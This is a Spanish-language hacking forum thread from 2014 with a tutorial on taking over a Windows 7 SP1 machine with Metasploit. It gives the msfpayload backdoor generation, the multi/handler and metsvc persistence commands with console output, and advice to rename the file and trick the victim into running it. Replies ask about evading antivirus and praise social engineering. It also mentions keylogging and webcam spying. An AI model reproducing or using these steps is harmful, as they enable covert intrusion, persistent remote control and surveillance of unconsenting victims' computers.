comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Explotando windows 7 sp1 con metasploit

  • 2 Respuestas
  • 6089 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado arm972

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Mayo 01, 2014, 12:10:08 pm »
Hola a todos ,aquí les traigo un tutorial de como infectar windows 7 sp1 por medio de la generación de un payload por el modulo msfpayload de metasploit ,generaremos este payload para poder que la victima reciba el archivo lo ejecute y asi poder obtener una shell meterpreter  8)  y tener control total sobre esta maquina .

aquí van los pasos a seguir :

1.Generamos el payload con el modulo msfpayload de metasploit ,este payload seria la backdoor para tener control sobre la victima una vez haya recibido nuestra backdoor ,para esto ingresamos a nuestra terminal y escribimos :

Link de la imagen de el procedimiento:



donde:

LHOST=tu ip local.
LPORT=puerto de escucha del payload "backdoor" pueden usar cualquier puerto a su gusto.
x >/root/backdoor.exe  este parámetro es para especificar donde vamos a generar el archivo de nuestro payload "backdoor".

2.Ingresamos a nuestra consola de metasploit para ya entrar en efectividad del payload generado por medio de un exploit para esto hacemos lo siguiente:

donde vamos a decirle a metasploit que vamos a usar cierto exploit y sus respectivos parámetros .

vamos a usar un exploit multi-cabecera.

link de la imagen del procedimiento:



use exploit/multi/handler ="aqui estamos diciendo a metasploit que vamos a usar este exploit"

set payload windows/meterpreter="aquí estamos defiendo el payload para nuestro exploit "backdoor".

set lhost=tu dirección ip local

set lport=puerto de escucha.

run para dar como tal ya ejecución a nuestro exploit:

ya como tal se van a la carpeta en este caso root donde van a poder encontrar el archivo backdoor.exe , para no levantar muchas sospechas lo nombramos de otra manera por logica ,bueno ya si todo va bien ,tendremos que por medio de nuestras técnicas de ingeniera social hacer llegar nuestro backdoor a la victima  y poder tener acceso a nuestra sesión de meterpreter.

3.procedemos a ejecutar un servicio de acceso y control  para inyectárselo a nuestra victima para así tenerla controlada de forma remota ,hacemos lo siguiente:

meterpreter > run metsvc
  • Creating a meterpreter service on port 31337
  • Creating a temporary installation directory C:\DesktopxD ;) ........................
  •   >> Uploading metsrv.dll...
  •   >> Uploading metsvc-server.exe...
  •   >> Uploading metsvc.exe...
  • Starting the service...
  •       * Installing service metsvc

 * Starting service
Service metsvc successfully installed.

meterpreter >


4.Nuestra backdoor ya se esta ejecutando como tal en el equipo victima en el puerto  31337 y vamos a declara y definir que vamos a esta maquina  escucharlo por el puerto 31337 y hacemos lo siguiente en nuestra consola de meterpreter:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST xxx.xxx.xxx.xxx
RHOST => xxx.xxx.xxx.xxx
msf exploit(handler) > exploit

  • Starting the payload handler...
  • Started bind handler
  • Meterpreter session 2 opened (xxx.xxx.xxx.xxx:31337 -> xxx.xxx.xxx.xxx:31337)


meterpreter >

donde:
set PAYLOAD windows/metsvc_bind_tcp

Aquí estamos definiendo que este escuchando al equipo atacado de manera silenciosa.

set LPORT:

puerto de escucha de el equipo victima.

set RHOST:

Dirección ip del equipo atacado.

ya teniendo control de una sesión meterpreter como tal podemos hacer lo que se nos ocurra como tomar las pulsaciones de el teclado,tomar fotos de la web cam etc etc  ;D .

Aquí termina este pequeño tutorial ,todo es con fines educativos de conocimiento de técnicas .

Dejen sus comentarios,complementos,dudas ,gracias a todos :)


Nota de moderador: No se permite ningún tipo de enlace ajeno al foro, y menos para promocionar un sitio web personal.

Lee las reglas: http://underc0de.org/foro/underc0de/reglas-generales-del-foro-(lectura-obligatoria)/

Atte, LucaSthefano
« Última modificación: Mayo 01, 2014, 07:42:18 pm por ANTRAX »

Desconectado t0n4

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Mayo 05, 2014, 05:03:09 pm »
Buena tecnica, pero no siempre tenemos suerte con la ingenieria social, algunas veces he probado esa tecnica, y tengo que comprimir la backdoor.exe porque algunos antivurus la detectan y la eliminan.Tengo dos preguntas.

1 Hay alguna forma de que la backdoor no sea detectada por antivirus??
2 Existe alguna forma de obtener una session meterpreter a  windows 7 con alguna tecnica que no sea por ingenieria social??
Gracias de antemano..
   Salu2: shirylmfao
« Última modificación: Septiembre 18, 2014, 11:04:01 pm por shirylmfao »
"La Imaginación es más importante que el Conocimiento"

Desconectado Cl0udswX

  • *
  • Colaborador
  • *
  • Mensajes: 870
  • Actividad:
    1.67%
  • Reputación 4
  • La fisica es el sistema operativo del universo.
    • Ver Perfil
    • cl0udswz - Sequre
  • Skype: cl0udzwx
  • Twitter: @cl0udswzsequre
« Respuesta #2 en: Mayo 13, 2014, 09:19:50 pm »
Buenas tardes hermano.

1ero. Tienes una forma de redactar un poco confusa y desordenada, lo cual dificulta su correcta comprensión. (Podrías editarlo para que quede de forma mas clara y comprensible)

2do. Las imágenes están caídas. (Podrías intentar subirlas nuevamente)

3ero. A grandes rasgos eso que describes es muy similar a compilar algún troyano para luego enviarlo tirando de la ingeniería social.




1 Hay alguna forma de que la backdoor no sea detectada por antivirus??

Que hable la sabiduría..

2 Existe alguna forma de obtener una session meterpreter a  windows 7 con alguna tecnica que no sea por ingenieria social??
Gracias de antemano..
   Salu2: shirylmfao

Es el clásico método de recopilar información (servicios, aplicaciones y sus versiones, puertos abiertos, tipo de conexión, etc..) y luego vulnerarlas con algún exploit que no haya sido parcheado aun.

P.D La ingeniería social funciona, simplemente es cuestión de ser audaz.

Saludos por allá hermanos.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


 

¿Te gustó el post? COMPARTILO!



Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 2209
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Crackear password de administrador en windows usando Backtrack 3

Iniciado por Devilboy

Respuestas: 3
Vistas: 3170
Último mensaje Marzo 24, 2010, 12:46:31 am
por ||•?¤?- SeCurity-?¤?•||
Aplicación para enviar comandos a pc remota (Windows)

Iniciado por fermino

Respuestas: 6
Vistas: 4656
Último mensaje Noviembre 01, 2013, 08:23:34 pm
por aquelalle
Como entrar en una maquina windows con recursos compartidos.

Iniciado por ANTRAX

Respuestas: 1
Vistas: 2596
Último mensaje Febrero 18, 2010, 02:27:46 pm
por OSX
Usando Javascript para ejecutar tareas en Windows [cmd]

Iniciado por Jimeno

Respuestas: 4
Vistas: 10823
Último mensaje Octubre 12, 2014, 07:10:26 pm
por syskc0